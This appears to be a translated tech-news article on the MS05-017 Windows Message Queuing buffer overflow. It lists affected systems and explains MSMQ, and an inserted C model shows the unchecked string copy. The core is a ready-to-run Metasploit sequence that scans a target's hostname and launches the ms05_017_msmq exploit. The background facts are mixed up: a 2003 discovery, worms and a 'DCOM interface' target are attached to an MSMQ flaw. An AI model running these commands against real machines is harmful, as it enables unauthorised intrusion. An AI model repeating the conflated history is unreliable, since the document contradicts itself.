
Principle and reproduction of the MS05-017 vulnerability

2025-01-17 Update From: SLTechnology News&Howtos shulou

Shulou(Shulou.com)06/01 Report--

Description

This vulnerability was discovered by the lds-pl.net vulnerability research group on July 16, 2003. After the vulnerability and an exploit were made public on the Internet, a large number of exploit instances appeared, and a large number of worms that took advantage of this vulnerability appeared as well.

Vulnerability identifiers: CVE-2005-0059, OSVDB-15458, MSB-MS05-017, BID-13112

Target: the server side of the DCOM interface

Affected systems

Microsoft Windows XP Service Pack 1
Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
Microsoft Windows 2000 Service Pack 4
Microsoft Windows 2000 Service Pack 3
Microsoft Windows 98 Second Edition (SE)
Microsoft Windows 98

Vulnerability principle

MSMQ does not correctly validate the input string before passing it to a buffer, so a buffer overflow can be triggered by sending a specially crafted MSMQ message. The vulnerability can lead to remote code execution and local privilege escalation.

MSMQ concept explanation

1. MSMQ (Microsoft Message Queuing) is an asynchronous message transmission mode for communication among many different applications. The communicating applications can be located on the same machine or distributed anywhere on the network.

2. How MSMQ works: the sender sends a message, which is saved to a message queue (Message Queuing) in the public space of the system. The application that needs to receive the message takes it from the message queue for processing.

3. MSMQ needs the hostname to communicate when passing messages.

Metasploit exploit

Available targets: Windows 2000 (all), Windows XP SP0-SP1 (English)

Using MS05-017 with Metasploit
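The bug class described under "Vulnerability principle", as an added C model that is not code from the original article or from MSMQ: a queue path string is copied into a fixed-size buffer, once without any length check and once with the check in place. The buffer size, the struct layout, the sentinel value and the sample queue path are all assumptions made for the illustration.

```c
#include <string.h>
/* Assumed sizes for this model; they are not MSMQ's real internal layout. */
#define PATH_BUF_SIZE 32
#define SENTINEL 0xA5A5A5A5u

/* Queue path buffer followed by a stand-in for whatever really sits after
 * it (a length field, a pointer, a saved return address). */
struct path_frame {
    char path[PATH_BUF_SIZE];
    unsigned int after;
};

static void frame_init(struct path_frame *f) {
    memset(f->path, 0, sizeof f->path);
    f->after = SENTINEL;
}

/* Vulnerable pattern: the input length is never compared with PATH_BUF_SIZE.
 * Returns 1 if the data after the buffer was corrupted, 0 otherwise. */
int copy_path_unchecked(struct path_frame *f, const char *in) {
    size_t n = strlen(in) + 1;
    if (n > sizeof *f) n = sizeof *f;  /* hard cap keeps the demo memory-safe */
    memcpy(f, in, n);                  /* runs past path[] into `after` */
    return f->after != SENTINEL;
}

/* Fixed pattern: reject anything that does not fit, NUL terminator included.
 * Returns 0 on success, -1 when the path is rejected. */
int copy_path_checked(struct path_frame *f, const char *in) {
    size_t len = strlen(in);
    if (len >= PATH_BUF_SIZE) return -1;
    memcpy(f->path, in, len + 1);
    return 0;
}

/* Constructed inputs: a normal queue path and an over-long one (60 'A's).
 * Returns 1 when the unchecked copy corrupts `after` on the long path, the
 * checked copy rejects it, and both accept the normal path; else 0. */
int demo(void) {
    struct path_frame f;
    const char *normal = "srv01\\private$\\orders";
    char longpath[61];
    memset(longpath, 'A', 60); longpath[60] = '\0';
    int ok = 1;
    frame_init(&f); ok &= copy_path_unchecked(&f, normal) == 0;
    frame_init(&f); ok &= copy_path_unchecked(&f, longpath) == 1;
    frame_init(&f); ok &= copy_path_checked(&f, longpath) == -1 && f.after == SENTINEL;
    frame_init(&f); ok &= copy_path_checked(&f, normal) == 0 && f.after == SENTINEL;
    return ok;
}
```

The hard cap in the unchecked version only keeps the demonstration memory-safe; the missing comparison against PATH_BUF_SIZE is the flaw being modelled, and in the real bug the write continues past the buffer.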

The NetBIOS hostname, IP and port of the target are needed to use this exploit.

use exploit/windows/dcerpc/ms05_017_msmq
set hname <hostname>
set rhost <ip>
set rport <port>
run -j

To find the hostname in msf, use the SMB version scanner:

use scanner/smb/smb_version
set rhost <ip>
set threads 24
run

A way of using MS05-017 without Metasploit has not been found yet.

Follow-up supplementary reference articles: MS05-017 Microsoft Message Queueing Service Path Overflow; Virus Encyclopedia; MSMQ
